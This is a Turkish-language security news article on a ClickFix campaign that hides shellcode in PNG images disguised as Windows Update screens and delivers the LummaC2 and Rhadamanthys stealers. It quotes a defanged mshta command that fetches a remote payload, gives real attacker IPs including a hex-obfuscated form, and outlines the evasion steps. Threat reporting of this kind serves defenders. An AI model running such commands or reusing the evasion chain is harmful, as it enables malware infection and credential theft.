Huntress’teki siber güvenlik araştırmacıları, Windows Update ekranları olarak gizlenen PNG görüntüleri içindeki kötü amaçlı kodları gizlemek için steganografiden yararlanan karmaşık bir ClickFix kampanyasını ortaya çıkardı.
Saldırı zinciri, LummaC2 ve Rhadamanthys de dahil olmak üzere bilgi hırsızlığı yapan kötü amaçlı yazılımların çeşitli türlerini, kullanıcıları Windows Çalıştır istemi aracılığıyla komutları yürütmeye yönlendiren aldatıcı bir sosyal mühendislik tekniği aracılığıyla dağıtıyor.
ClickFix, siber suç cephaneliğinde giderek büyüyen bir tehdit vektörünü temsil ediyor ve kullanıcının tanıdık Windows arayüzü öğelerine duyduğu güveni istismar ediyor.
Kampanya, tam ekran modunda gerçekçi “Güncellemeler üzerinde çalışma” animasyonlarını görüntüleyen ikna edici sahte Windows Güncelleme ekranlarıyla başlıyor.
Sahte güncelleme tamamlandığında kullanıcılardan basit ama kötü amaçlı bir talimatı izlemeleri istenir: Win+R kullanarak Çalıştır istemini açın, ardından Ctrl+V kullanarak önceden kopyalanmış komutu yapıştırın ve çalıştırın.
Saldırı, beş farklı aşamadan oluşuyor ve her katman, tespit edilmekten kaçınmak için kafa karıştırıcı bir etki yaratıyor.
İlk aşamada, uzak bir sunucudan PowerShell yükleyicisini indiren JScript kodunu yürütmek için mshta.exe kullanılır.
Bu ikinci aşamada, otomatik analizin kafasını karıştırmak için tasarlanmış kapsamlı önemsiz kodlar bulunur, ancak bu gürültünün altında, saldırının en yenilikçi bileşeninin temelini oluşturan dinamik olarak şifresi çözülmüş bir .NET derlemesi yatmaktadır.
Üçüncü aşama, steganografik yükleyiciye, şifrelenmiş PNG görüntü dosyalarında gizli olan kabuk kodunu çıkaran bir .NET derlemesini sunar.
Saldırganlar, dosyalara kötü amaçlı veriler eklemek yerine, belirli renk kanallarını kullanarak yürütülebilir kodu doğrudan PNG görüntülerinin piksel verilerine kodlar.
Son JavaScript verisi karmaşık değildir. Düz metin komutu, mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz.
Özel steganografi algoritması, BGRA piksel verilerinin kırmızı kanalını hedef alır ve hesaplanan değerleri kırmızı kanal baytlarıyla XORing yoluyla kabuk kodunu çıkarır.
Bu yaklaşım, kötü amaçlı yazılım dağıtımında önemli bir teknik evrimi temsil etmektedir. Saldırganlar, yük verilerini meşru görünen görüntü dosyalarına yerleştirerek, geleneksel dosya imzası tespitini atlıyor ve adli analizleri karmaşık hale getiriyor.
Kabuk kodu çıkarma işlemi, bitmap’in ham piksel verilerine sistem belleği aracılığıyla erişmeyi, satır dolgusunu hesaba katacak adım uzaklıklarını hesaplamayı ve ayrı renk kanallarından şifrelenmiş yükü bayt bayt yeniden oluşturmayı içerir.
Çörek Paketli Nihai Yük
Çıkarıldıktan sonra kabuk kodu, standart işlem ekleme tekniklerini uygulayan dördüncü aşamalı bir .NET derlemesi yoluyla explorer.exe işlemine enjekte edilir.
Bu aşama, çalışma zamanında C# kaynak kodunu dinamik olarak derler, hedef işlem içinde yürütülebilir bellek ayırır ve enjekte edilen yükü yürütmek için uzak bir iş parçacığı oluşturur.
Son aşamadaki kabuk kodu, tehdit aktörleri tarafından sıklıkla kötüye kullanılan meşru bir kabuk kodu paketleyicisi olan Donut kullanılarak paketlenir. Analiz, paketlenmemiş son yükün kampanya değişkenine bağlı olarak LummaC2 veya Rhadamanthys hırsızı olduğunu ortaya koyuyor.
Huntress, Ekim 2025’in başından bu yana, hem ilk MSHTA aşamalarını hem de PowerShell yükleyicilerini barındıran 141.98.80.175 IP adresiyle ilişkili birden fazla saldırı kümesini izledi.
Özellikle tehdit aktörü, dize tabanlı tespitten kaçınmak için mshta komutlarında (141.0×62.80.175 olarak görünen) hex kodlu IP oktetleri kullanıyor.
Kampanya, Kasım ayında Rhadamanthys altyapısını hedef alan Oyun Sonu Operasyonu’nun kolluk kuvvetleri tarafından durdurulmasına rağmen devam ediyor.
Kuruluşlar, ClickFix sosyal mühendislik taktiklerini belirlemek için kullanıcı farkındalığı eğitimlerine öncelik vermelidir.
Teknik kontroller arasında Kayıt Defteri veya Grup İlkesi aracılığıyla Windows Çalıştır isteminin kapatılması, mshta.exe yürütülmesini kısıtlamak için uygulama beyaz listesi oluşturma ve şüpheli .NET derleme yükleme kalıplarının izlenmesi yer alır.
Uç nokta algılama ve yanıt çözümleri, dinamik kod derlemesini ve yansıtıcı montaj yükleme tekniklerini algılamaya odaklanmalıdır.
Kampanya, steganografinin, çok aşamalı yürütme zincirlerinin ve sosyal mühendisliğin geleneksel güvenlik savunmalarına meydan okuyan zorlu tehditler oluşturmak için nasıl bir araya geldiğini gösteriyor.
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.